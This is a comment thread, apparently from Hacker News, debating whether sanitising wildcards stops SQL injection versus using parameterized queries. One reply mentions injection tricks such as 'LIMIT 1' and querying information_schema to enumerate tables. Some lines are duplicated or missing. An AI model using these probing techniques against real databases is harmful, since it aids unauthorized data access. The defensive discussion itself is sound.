Comment by dataflow
2 months ago
This fails if either the UI sanitizes wildcards, or if the database prohibits them, or if it produces so much data that you can't ingest it in time, etc.
2 months ago
This fails if either the UI sanitizes wildcards, or if the database prohibits them, or if it produces so much data that you can't ingest it in time, etc.
It also fails if the system was written using parameterized queries. I wouldn't expect a system to be sanitizing anything if fails to take the most basic step for db access. This whole discussion is only relevant for systems developed by amateurs. SQL injection can only work at all if you use string concatenation to create queries, which you should never do.
Injections don't always need ''. The statements
and
if injected into a query will give different answers if SQLI exists.
There are MANY other tricks that don't involve ''.
Besides, consider the number of valid queries done by the application that involve '*'. You are not going to turn that off.
Sanitization almost always fails. This becomes an arms race.
If you do it wrong, yes. Sure, there is no 100% security, but honestly, it's 2025. We already know the techniques how to prevent SQL injection of any kind. I wrote about this here: https://valentin.willscher.de/posts/sql-api/
Right but the case that is being imagined here is a site that perfectly sanitises * but somehow still allows SQL injection? I don't think so.
5 replies →
The parser isn't shown there, so it isn't clear what would happen with weird input.
Have you had anyone do a penetration test on it?
5 replies →
There are trivial ways around all of those. `LIMIT 1`, `SELECT .. FROM information_schema...`, etc.
> There are trivial ways around all of those. `LIMIT 1`
LIMIT 1 limits row count. The issue here was columns. Like a giant blob someone might've stored in there.
> `SELECT .. FROM information_schema...`
no such table: information_schema.columns
> etc.
https://news.ycombinator.com/item?id=43181799
> no such table: information_schema.columns
Oh I guess I will try the other very small number of options that it could be.
> LIMIT 1 limits row count. The issue here was columns. Like a giant blob someone might've stored in there.
Come on, this is pure nonsense.